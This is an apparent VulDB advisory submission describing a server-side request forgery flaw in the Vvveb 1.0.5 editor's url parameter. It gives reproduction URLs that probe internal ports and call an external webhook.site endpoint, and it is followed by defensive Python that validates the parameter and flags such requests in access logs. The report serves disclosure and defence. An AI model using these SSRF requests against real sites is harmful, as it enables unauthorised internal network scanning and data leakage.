Submit #624973: Vvveb 1.0.5 Server-Side Request Forgery

Title: Vvveb 1.0.5 Server-Side Request Forgery
Description:

The endpoint [/vadmin123/?module=editor/editor&name=] is used for modifying a page with a drag-and-drop editor. The issue is that an attacker can pass an arbitrary URL, and the web app will attempt to load it. This can be used to perform Server-Side Request Forgery (SSRF) and, from there, internal port scanning. The endpoint is accessible to "Editors" or anyone with privileges to modify posts or pages.

Reproduce:

Log in as an editor and open the following endpoint:
/vadmin123/index.php?module=content/posts&type=post

Open a post of your choice in "Design" mode, where you can perform drag and drop; you may get an endpoint like this:
http://127.0.0.1/vadmin123/?module=editor/editor&name=Etiam+leo+nibh%2C+consectetur+nec+orci+et%2C+tempus+tempus+ex&url=//127.0.0.1/hello-world-4&template=content/post.html

For simplicity, I have changed the name of my post to shorten the URL. To perform SSRF, modify the URL to something like this:
http://127.0.0.1/vadmin123/?module=editor/editor&name=shorty&url=//127.0.0.1:80/

This will open the index page of Vvveb for you. You can also open other pages, like contact:
http://127.0.0.1/vadmin123/?module=editor/editor&name=shorty&url=//127.0.0.1:80/page/contact

To use this for port scanning, you can simply change port 80 to a non-existent port like 9999:
http://127.0.0.1/vadmin123/?module=editor/editor&name=shorty&url=//127.0.0.1:9999/

In this case, you get the following error:
Firefox Can’t Open This Page
To protect your security, 127.0.0.1 will not allow Firefox to display the page if another site has embedded it.
To see this page, you need to open it in a new window.
This is normal.

Now, to test whether you can actually be sure that you can scan internal ports, create a dummy PHP server:
$ php -S x.x.x.x:10001

Perform the connection:
http://127.0.0.1/vadmin123/?module=editor/editor&name=shorty&url=//127.0.0.1:10001/

You will get requests in your PHP CLI, and you will also see the following page load:
The requested resource /?theme=landing&r=0.5980099159582586 was not found on this server.

In a real-world scenario, we won't have access to an internal PHP server. But you can also send external HTTP requests to sites like webhook.site:
http://127.0.0.1/vadmin123/?module=editor/editor&name=shorty&url=//webhook.site/xxxxxxxxxxxxxxxxxxxxxxx

Response on page:
This URL has no default content configured. View in Webhook.site.

To perform port scanning, you can keep changing the port until you figure out which internal services are running and actually see them.
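As an added example (not part of this submission or of Vvveb's own code), a Python reference check for the editor's `url` parameter described above, plus the same policy applied to access-log lines so a site can both reject the protocol-relative //host:port/ forms and spot past attempts. SITE_HOST, the sample log lines and the webhook path are constructed assumptions.

```python
from urllib.parse import parse_qs, urlsplit

# Constructed assumption: the host the site is served from; only pages on
# this host may be loaded into the editor preview.
SITE_HOST = "127.0.0.1"

def classify_editor_url(url: str, site_host: str = SITE_HOST) -> str:
    """Return "allow" or a rejection reason for an editor `url` value.
    Policy: same-origin reference on the default port only, so a scheme,
    a foreign host, an explicit port or a backslash is refused."""
    if "\\" in url:                      # /\evil.com style authority tricks
        return "backslash not allowed"
    parts = urlsplit(url)
    if parts.scheme:                     # http:, file:, gopher:, ...
        return "scheme not allowed"
    if parts.netloc:                     # reached for //authority/... forms
        try:
            port = parts.port            # ValueError on a non-numeric port
        except ValueError:
            return "malformed authority"
        if port is not None:             # //127.0.0.1:9999/ is the scan case
            return f"explicit port {port}"
        if (parts.hostname or "").lower() != site_host.lower():
            return f"foreign host {parts.hostname}"
    if not parts.path.startswith("/"):
        return "path must be absolute"
    return "allow"

def flag_editor_requests(log_lines, site_host: str = SITE_HOST):
    """Apply the same policy to common-log-format lines; return
    (client_ip, url_value, reason) for each editor load that violates it."""
    flagged = []
    for line in log_lines:
        try:
            target = line.split('"')[1].split()[1]   # request path+query
        except IndexError:
            continue                                  # not a request line
        params = parse_qs(urlsplit(target).query)
        if params.get("module") != ["editor/editor"] or "url" not in params:
            continue
        reason = classify_editor_url(params["url"][0], site_host)
        if reason != "allow":
            flagged.append((line.split(" ", 1)[0], params["url"][0], reason))
    return flagged

SAMPLE_LOG = [  # constructed lines mirroring the report's requests
    '127.0.0.1 - - [29/Jul/2025:20:22:01 +0000] "GET /vadmin123/?module=editor/editor&name=shorty&url=//127.0.0.1/hello-world-4 HTTP/1.1" 200 4120',
    '10.0.0.7 - - [29/Jul/2025:20:22:05 +0000] "GET /vadmin123/?module=editor/editor&name=shorty&url=//127.0.0.1:9999/ HTTP/1.1" 200 4120',
    '10.0.0.7 - - [29/Jul/2025:20:22:09 +0000] "GET /vadmin123/?module=editor/editor&name=shorty&url=//webhook.site/PLACEHOLDER HTTP/1.1" 200 4120',
]
```

Running flag_editor_requests(SAMPLE_LOG) returns the two requests from 10.0.0.7 with their reasons; the legitimate same-host page load is left alone.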
Source: https://hkohi.ca/vulnerability/9
User: 0xHamy (UID 88518)
Submission: 07/29/2025 20:22 (9 months ago)
Moderation: 08/04/2025 08:27 (6 days later)
Status: Accepted
VulDB entry: 318646 [givanz Vvveb up to 1.0.5 Drag-and-Drop Editor editor url server-side request forgery]
Points: 19
